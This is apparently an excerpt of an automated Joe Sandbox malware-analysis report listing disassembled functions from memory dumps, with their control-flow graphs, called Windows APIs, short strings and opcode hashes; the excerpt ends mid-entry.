                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b85a47c3f2e07c2714d0bb82d3784869fdf2fb34e3806259acd8e1c09e56ff9f
                                                        • Instruction ID: 7ddadc959686bbe50dda47acad6da2c6a5cee8b1edde963469501297f073905d
                                                        • Opcode Fuzzy Hash: b85a47c3f2e07c2714d0bb82d3784869fdf2fb34e3806259acd8e1c09e56ff9f
                                                        • Instruction Fuzzy Hash: DFB15E70E003099FDF24CFA9D88579DBFF2AF88318F148529D855E7294EB749885CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334804 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1009 1334804-133489c 1012 13348e6-13348e8 1009->1012 1013 133489e-13348a9 1009->1013 1015 13348ea-1334902 1012->1015 1013->1012 1014 13348ab-13348b7 1013->1014 1016 13348da-13348e4 1014->1016 1017 13348b9-13348c3 1014->1017 1022 1334904-133490f 1015->1022 1023 133494c-133494e 1015->1023 1016->1015 1018 13348c7-13348d6 1017->1018 1019 13348c5 1017->1019 1018->1018 1021 13348d8 1018->1021 1019->1018 1021->1016 1022->1023 1025 1334911-133491d 1022->1025 1024 1334950-1334962 1023->1024 1032 1334969-1334995 1024->1032 1026 1334940-133494a 1025->1026 1027 133491f-1334929 1025->1027 1026->1024 1029 133492b 1027->1029 1030 133492d-133493c 1027->1030 1029->1030 1030->1030 1031 133493e 1030->1031 1031->1026 1033 133499b-13349a9 1032->1033 1034 13349b2-13349c0 1033->1034 1035 13349ab-13349b1 1033->1035 1038 13349c8-13349d2 1034->1038 1035->1034 1039 13349dc-1334a0f 1038->1039 1042 1334a11-1334a15 1039->1042 1043 1334a1f-1334a23 1039->1043 1042->1043 1044 1334a17-1334a1a call 1330ab8 1042->1044 1045 1334a33-1334a37 1043->1045 1046 1334a25-1334a29 1043->1046 1044->1043 1049 1334a47-1334a4b 1045->1049 1050 1334a39-1334a3d 1045->1050 1046->1045 1048 1334a2b-1334a2e call 1330ab8 1046->1048 1048->1045 1052 1334a5b 1049->1052 1053 1334a4d-1334a51 1049->1053 1050->1049 1051 1334a3f 1050->1051 1051->1049 1056 1334a5c 1052->1056 1053->1052 1055 1334a53 1053->1055 1055->1052 1056->1056
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k$\V/k
                                                        • API String ID: 0-2939617536
                                                        • Opcode ID: ced830ed49c7443383895b66aeeb42e24f3e6f1cef25716982300777551543e5
                                                        • Instruction ID: 40e6b39cbb351abe9475238357852ade9537fa9741d24d0c5c3c9ba769a603e7
                                                        • Opcode Fuzzy Hash: ced830ed49c7443383895b66aeeb42e24f3e6f1cef25716982300777551543e5
                                                        • Instruction Fuzzy Hash: E9715B70E003499FEB24CFA9D8807DDBFF1BF88318F148129E415AB254DB749882CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334810 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1057 1334810-133489c 1060 13348e6-13348e8 1057->1060 1061 133489e-13348a9 1057->1061 1063 13348ea-1334902 1060->1063 1061->1060 1062 13348ab-13348b7 1061->1062 1064 13348da-13348e4 1062->1064 1065 13348b9-13348c3 1062->1065 1070 1334904-133490f 1063->1070 1071 133494c-133494e 1063->1071 1064->1063 1066 13348c7-13348d6 1065->1066 1067 13348c5 1065->1067 1066->1066 1069 13348d8 1066->1069 1067->1066 1069->1064 1070->1071 1073 1334911-133491d 1070->1073 1072 1334950-13349a9 1071->1072 1082 13349b2-13349d2 1072->1082 1083 13349ab-13349b1 1072->1083 1074 1334940-133494a 1073->1074 1075 133491f-1334929 1073->1075 1074->1072 1077 133492b 1075->1077 1078 133492d-133493c 1075->1078 1077->1078 1078->1078 1079 133493e 1078->1079 1079->1074 1087 13349dc-1334a0f 1082->1087 1083->1082 1090 1334a11-1334a15 1087->1090 1091 1334a1f-1334a23 1087->1091 1090->1091 1092 1334a17-1334a1a call 1330ab8 1090->1092 1093 1334a33-1334a37 1091->1093 1094 1334a25-1334a29 1091->1094 1092->1091 1097 1334a47-1334a4b 1093->1097 1098 1334a39-1334a3d 1093->1098 1094->1093 1096 1334a2b-1334a2e call 1330ab8 1094->1096 1096->1093 1100 1334a5b 1097->1100 1101 1334a4d-1334a51 1097->1101 1098->1097 1099 1334a3f 1098->1099 1099->1097 1104 1334a5c 1100->1104 1101->1100 1103 1334a53 1101->1103 1103->1100 1104->1104
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k$\V/k
                                                        • API String ID: 0-2939617536
                                                        • Opcode ID: 00be3fc2ec8244409139ab0bf5b52474d27cb37410e94b446da29b53a5b6750f
                                                        • Instruction ID: 07c1f5f075f39673fee06f996498098cdaf8e89570e46ba783f2aafb23e9452b
                                                        • Opcode Fuzzy Hash: 00be3fc2ec8244409139ab0bf5b52474d27cb37410e94b446da29b53a5b6750f
                                                        • Instruction Fuzzy Hash: 31713D71E00349DFEB14DFA9D8847DEBBF2BF88318F148129E415AB254DB749842CB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0D2EE Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1360 6c0d2ee-6c0d2f0 1361 6c0d2f2-6c0d35e 1360->1361 1362 6c0d2bc-6c0d2c1 1360->1362 1366 6c0d360-6c0d366 1361->1366 1367 6c0d369-6c0d370 1361->1367 1364 6c0d2c3-6c0d2c5 1362->1364 1365 6c0d2c7-6c0d2c9 1362->1365 1364->1365 1368 6c0d2cb-6c0d2cd 1365->1368 1369 6c0d2cf-6c0d2d1 1365->1369 1366->1367 1370 6c0d372-6c0d378 1367->1370 1371 6c0d37b-6c0d3b3 1367->1371 1368->1369 1372 6c0d2d3-6c0d2d5 1369->1372 1373 6c0d2d7-6c0d2d9 call 6c0b35c 1369->1373 1370->1371 1376 6c0d3bb-6c0d41a CreateWindowExW 1371->1376 1372->1373 1377 6c0d2bb 1373->1377 1378 6c0d2dd-6c0d2de 1373->1378 1379 6c0d423-6c0d45b 1376->1379 1380 6c0d41c-6c0d422 1376->1380 1377->1362 1381 6c0d2e1-6c0d2eb 1377->1381 1385 6c0d468 1379->1385 1386 6c0d45d-6c0d460 1379->1386 1380->1379 1381->1360 1387 6c0d469 1385->1387 1386->1385 1387->1387
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C0D40A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 31c2f4105f843f5a07c9aec3e535679a39e486612840b63cb615d73ed8f819b7
                                                        • Instruction ID: 0ca92634b99aab2124053799dc92376d50465a92e01790d2d5c8e60fe24470a9
                                                        • Opcode Fuzzy Hash: 31c2f4105f843f5a07c9aec3e535679a39e486612840b63cb615d73ed8f819b7
                                                        • Instruction Fuzzy Hash: B951E0B1C00309AFEF55CFA9D884ADDBBB5BF48310F14812AE419AB250D771A945CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0D2F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06C0D40A
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: f93cd63d2ba7f01e0713d932ac821928260ef06403dd1147a1fcf94087fb3bfa
                                                        • Instruction ID: c9a84bc9aecc7fb54b6c688517801f74267c314ba4753a14d29c8bb8af368ca2
                                                        • Opcode Fuzzy Hash: f93cd63d2ba7f01e0713d932ac821928260ef06403dd1147a1fcf94087fb3bfa
                                                        • Instruction Fuzzy Hash: C241A0B1D00309EFEB14CFDAC884ADEBBB5BF48310F24812AE419AB250D775A945CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C09BFF Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 06C09C9F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 7b11848104afc05fac086c24bbc968c310563abc7e26af0ff3959c4f036a4e02
                                                        • Instruction ID: bbcc163dee67a272b0be894de7fe62236ae097d800a24ef2aa1d0431b240f207
                                                        • Opcode Fuzzy Hash: 7b11848104afc05fac086c24bbc968c310563abc7e26af0ff3959c4f036a4e02
                                                        • Instruction Fuzzy Hash: 2A21BAB1C0035A8FEB14EFAAD404BDEFBF4AF48210F10816AE858A7241D7789944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C09C38 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 06C09C9F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: c1ebfe0ca1c026150c36688e84b326fbcbe76809fa7334e54b3dc3a29398161e
                                                        • Instruction ID: 06276c406a3aab138c16463fd329f3e3b34acd7ab158429eb0367198caf2a29f
                                                        • Opcode Fuzzy Hash: c1ebfe0ca1c026150c36688e84b326fbcbe76809fa7334e54b3dc3a29398161e
                                                        • Instruction Fuzzy Hash: E811F3B2C006599FDB10DFAAC544BDEFBF4BF48324F15812AE818A7241D378A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0C24A Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06C0C2B6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: e05f3a83205a85f464e1be2c64dc8f29efe6f77fbf360566b2389ad23660965d
                                                        • Instruction ID: 03e5057f8cb3458d8aa6b9228ece7ac4765fae95309a73d035477b4396669a04
                                                        • Opcode Fuzzy Hash: e05f3a83205a85f464e1be2c64dc8f29efe6f77fbf360566b2389ad23660965d
                                                        • Instruction Fuzzy Hash: 021134B6C007498FDB10CF9AC844BCEFBF4EB48220F10851AD419A7640C375A545CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06C0B250 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 06C0C2B6
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3711507549.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_6c00000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 2815340e52811924dee6514a84823418ed1d37e6463040b569948de3312a948a
                                                        • Instruction ID: 94351d3f51d00fb10ce759f189c6c9264a22e170da36c9306ffd11955d4ad296
                                                        • Opcode Fuzzy Hash: 2815340e52811924dee6514a84823418ed1d37e6463040b569948de3312a948a
                                                        • Instruction Fuzzy Hash: 74111FB6C002498FEB20DF9AC848B9EBBF4EB88210F10851AD419A7640C379A505CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013341BD Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: ce6f1803710238a5b9bd4084889a84f6f3c3ff1023b6454983df39c708f3c33e
                                                        • Instruction ID: 16de85b736fa388cd0c3bb6825780fc508127c9e5edf7c83f2588cbfef2af29c
                                                        • Opcode Fuzzy Hash: ce6f1803710238a5b9bd4084889a84f6f3c3ff1023b6454983df39c708f3c33e
                                                        • Instruction Fuzzy Hash: 34B14C70E00209CFEB24CFA9D8857DDBBF1BF88318F148129E815E7294EB749885CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01333E74 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: b03546069b9c9205acc902ec363a519be272b915021708a5445f6548e8983c1e
                                                        • Instruction ID: 8eacf1fead1d228d5ffc4d2a3b53fee79c37d2f0c6d6379f4b975f96769b0e08
                                                        • Opcode Fuzzy Hash: b03546069b9c9205acc902ec363a519be272b915021708a5445f6548e8983c1e
                                                        • Instruction Fuzzy Hash: 1C917B70E002099FEB24CFA8D9857DEFFF2BF88318F148129E454A7254DB749886CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01336EDB Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: d133865c97ec1e3f9af99add7c43cb5b373ab7b8e7701d3c03247d9c58d4ff29
                                                        • Instruction ID: fe7c96a83cab378dcbaf415dafc313e3e0841d55509f2ede40af8d852e2e1621
                                                        • Opcode Fuzzy Hash: d133865c97ec1e3f9af99add7c43cb5b373ab7b8e7701d3c03247d9c58d4ff29
                                                        • Instruction Fuzzy Hash: 69519D74B00219DFDB14DB69C458AAD7BF2BF89704F2040A9E506EB3A1CB75DC41CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01337D2C Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 713504ea6e9d4e4e8a1e2cf55b61401dafebb0708d14fdd663e1f8c9bdaa4420
                                                        • Instruction ID: 21bd33131818159fac37133d7dd8b1bf58ca9ca759867029aff0ecec725f47e3
                                                        • Opcode Fuzzy Hash: 713504ea6e9d4e4e8a1e2cf55b61401dafebb0708d14fdd663e1f8c9bdaa4420
                                                        • Instruction Fuzzy Hash: 76317070E10209DFDB56DFA8C4547AEB7B2FF8A304F20852AE805EB241E7749C46CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01337D90 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: e5b54c90c2df42babe831aa2ebb38ce51ad0c9e2b42ca07b776fbde7fd63da1a
                                                        • Instruction ID: b2866cf82cb141ee2563def1603437be3d5027a163e17f820be79052eed3e9e5
                                                        • Opcode Fuzzy Hash: e5b54c90c2df42babe831aa2ebb38ce51ad0c9e2b42ca07b776fbde7fd63da1a
                                                        • Instruction Fuzzy Hash: B6317071E00209DBDB15DFA9C4447AEB7B2FFC9304F10852AE905EB240EBB0AD46CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01336B99 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LRq
                                                        • API String ID: 0-3187445251
                                                        • Opcode ID: 2c7a0d774e4b016e8114a0f5eb61ba3bbec6772a0834be2116b1d1c6a1c3a91e
                                                        • Instruction ID: 1e97f9e0bf001e28ccfd33bf83f4c4cf556b7fd347a0ae9630874b731e4d6b1a
                                                        • Opcode Fuzzy Hash: 2c7a0d774e4b016e8114a0f5eb61ba3bbec6772a0834be2116b1d1c6a1c3a91e
                                                        • Instruction Fuzzy Hash: B721CF317042945FC716EB79D4606EE3BF2EF8A210B1445EAD045CB396DE259C06CB96
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01330838 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Co
                                                        • API String ID: 0-3798529171
                                                        • Opcode ID: 373026a068bfec52f5a9a43e724a98c672926c01f32efb1c94ada36a7c251adb
                                                        • Instruction ID: 53f007c7a45e5148fb74ff36c4861a62719a8ed01e0739a3e0b80565524328ae
                                                        • Opcode Fuzzy Hash: 373026a068bfec52f5a9a43e724a98c672926c01f32efb1c94ada36a7c251adb
                                                        • Instruction Fuzzy Hash: F611A334A003098BEF6A9A7DD4403693BA5FBC622CF14497AE052CF242DA65CC868BD5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01330848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Co
                                                        • API String ID: 0-3798529171
                                                        • Opcode ID: 81d3e0f6bbd81cde8868844a02522ca05a2b09f3c16e5166fb3d06f3ca445aab
                                                        • Instruction ID: 85c708076c3b81f8ec0cc18e8c73bb3876d17d9df3d57766cd2c8be2ba0d6058
                                                        • Opcode Fuzzy Hash: 81d3e0f6bbd81cde8868844a02522ca05a2b09f3c16e5166fb3d06f3ca445aab
                                                        • Instruction Fuzzy Hash: 2E11A334B002098BEF6DAA7DD4447693695FBC562CF104939F016CF352EA65CC868BD5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339A44 Relevance: .4, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e156e348c66e3f4954ea8a5b20f98ab910aa52eac702058ca60871b6c689c541
                                                        • Instruction ID: 593d8b03f4132e82d179565ec55a65a8203f464b6826b1115762d4f6fbd2b9bf
                                                        • Opcode Fuzzy Hash: e156e348c66e3f4954ea8a5b20f98ab910aa52eac702058ca60871b6c689c541
                                                        • Instruction Fuzzy Hash: FBD19D34B00205CFDB15EB68D884BADBBB2FB89318F248529E906DB355CB75DD42CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013382EF Relevance: .3, Instructions: 349COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9a890fc0c582c1de62e6f836efd74225d2053bd4a4374dc66ad68ac7e7a2005
                                                        • Instruction ID: db1aa682ccaa555f67778e6dee954d70e63d38fb5ca42329330e0f66f2de4f86
                                                        • Opcode Fuzzy Hash: c9a890fc0c582c1de62e6f836efd74225d2053bd4a4374dc66ad68ac7e7a2005
                                                        • Instruction Fuzzy Hash: B7D19E747002029BDB66FB38E55026873A3FBC6319F104A6AE506CB355CF75EC478BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0133D6E8 Relevance: .3, Instructions: 345COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 168b91043af5b4f06c016ec9aff7230be41b7a40eb90e254568d07c411849fde
                                                        • Instruction ID: f11a6a1b470cf0a81bc3988cadf99da33b80b9270e7d8567cf5cb6dd34bc01af
                                                        • Opcode Fuzzy Hash: 168b91043af5b4f06c016ec9aff7230be41b7a40eb90e254568d07c411849fde
                                                        • Instruction Fuzzy Hash: E2C1F370B002169FEB16DFA8C880B6EBBA6FBC5314F648569D415CB295CB31EC42C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01339DC0 Relevance: .3, Instructions: 288COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9d4e5e70d09666bd3b69bd4cecb051fc9d7d3f126fb56028318315d281d4844
                                                        • Instruction ID: f101cbc2b34374fbb109add7bc20d79908bbaaa1195499591116331e9ef921d1
                                                        • Opcode Fuzzy Hash: c9d4e5e70d09666bd3b69bd4cecb051fc9d7d3f126fb56028318315d281d4844
                                                        • Instruction Fuzzy Hash: B8A19B70B00205CFDB24DF6DD8807AEBBB2FB84318F24856AE909DB286D770D945CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334A8C Relevance: .3, Instructions: 262COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a96c50f6f68c1cfd3a39a7f705e94b5dd18c40b719cb9118d6800e7b0799fc9
                                                        • Instruction ID: f45533155d7aba2b667d15c31db6190655096bf5d46726c6d03e14de590492de
                                                        • Opcode Fuzzy Hash: 9a96c50f6f68c1cfd3a39a7f705e94b5dd18c40b719cb9118d6800e7b0799fc9
                                                        • Instruction Fuzzy Hash: E6B14B70E003099FEF24CFA9D8957DDBFF1AF88318F148129D855AB294EB749885CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01336CD7 Relevance: .1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 05432d4bdd113d24d174eb3f994dd3dbce1dedce215f5f9ce6aa8cbc82a6b3c0
                                                        • Instruction ID: 0c50f67ce3c51a39ee1d67fdd003f6a06c3c5beff7c5130d7197d7ee2f27badf
                                                        • Opcode Fuzzy Hash: 05432d4bdd113d24d174eb3f994dd3dbce1dedce215f5f9ce6aa8cbc82a6b3c0
                                                        • Instruction Fuzzy Hash: 655113B0D102189FDB18CFA9C899BDDBBF1BF88314F148129E819AB351D774A944CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01336CE0 Relevance: .1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3fd52a7f72f407ac2736d60582fc432c4cbfaf10f902737b62aa648943e7219
                                                        • Instruction ID: 60a34a24f3066f84fe89383e9ce9a2116b4ab8ee80f67dc3270816626f29b694
                                                        • Opcode Fuzzy Hash: f3fd52a7f72f407ac2736d60582fc432c4cbfaf10f902737b62aa648943e7219
                                                        • Instruction Fuzzy Hash: CA5123B0D003189FDB18CFA9C889B9DBBF1BF88314F158129E819AB351D774A944CF99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0133112B Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
